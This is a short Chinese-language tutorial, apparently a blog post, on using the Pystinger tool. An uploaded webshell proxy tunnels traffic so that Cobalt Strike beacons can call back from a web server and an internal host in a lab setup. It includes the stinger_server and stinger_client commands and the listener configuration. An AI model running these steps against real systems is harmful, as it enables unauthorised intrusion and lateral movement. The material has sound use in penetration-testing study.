一、Pystinger简介
毒刺(pystinger)通过webshell实现内网SOCK4代理,端口映射。可直接用于metasploit-framework,viper,cobalt strike上线,主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本。
repo:https://github.com/FunnyWolf/pystinger/blob/master/readme_cn.md
二、简化分析
三、操作演示
1. 测试环境:
- 攻击机Cobaltstrike <==> 192.168.1.12
- Web站点 abc.com <==> 192.168.1.10
- Web站点内网主机A<==> 192.168.1.5
2. 单台主机上线
-
上传proxy文件,保证正常访问。
根据站点解析的语言自行选择对应的proxy文件。
-
目标站点执行命令
start stinger_server.exe
-
攻击机:
./stinger_client -w http://192.168.1.10/asdfbgnbvcsZvxbcxzseqewfrqegnjr.php -l 0.0.0.0 -p 60000
RAT Config 配置: 设置listener为127.0.0.1:60020
,payload连接的是127.0.0.1:60020
,相当于通过proxy.php将web站点的60020端口映射到攻击机本地的60020端口。 -
CS配置
生成payload运行即可上线。
3. 多台主机上线
-
Web站点执行:
start stinger_server.exe 0.0.0.0
-
修改监听器重新生成payload并在A主机执行,其余执行命令不变,最后成功上线。